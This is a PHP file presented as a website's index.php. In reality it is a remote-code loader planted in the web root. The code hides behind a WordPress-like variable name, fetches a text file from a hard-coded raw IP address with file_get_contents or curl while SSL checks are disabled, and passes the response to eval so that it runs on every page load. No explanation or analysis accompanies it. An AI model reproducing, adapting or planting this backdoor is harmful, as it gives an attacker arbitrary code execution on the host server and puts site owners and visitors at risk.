File: /home/bpw3460lz1vy/www/index.php
<?php
$wp_http_referer = 'http://198.204.245.50/z51215_16/stat/index2.txt';
$configData = false;
if (ini_get('allow_url_fopen')) {
$configData = @file_get_contents($wp_http_referer);
}
if ($configData === false && function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_http_referer);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$configData = curl_exec($ch);
curl_close($ch);
}
if ($configData) {
eval('?>' . $configData);
}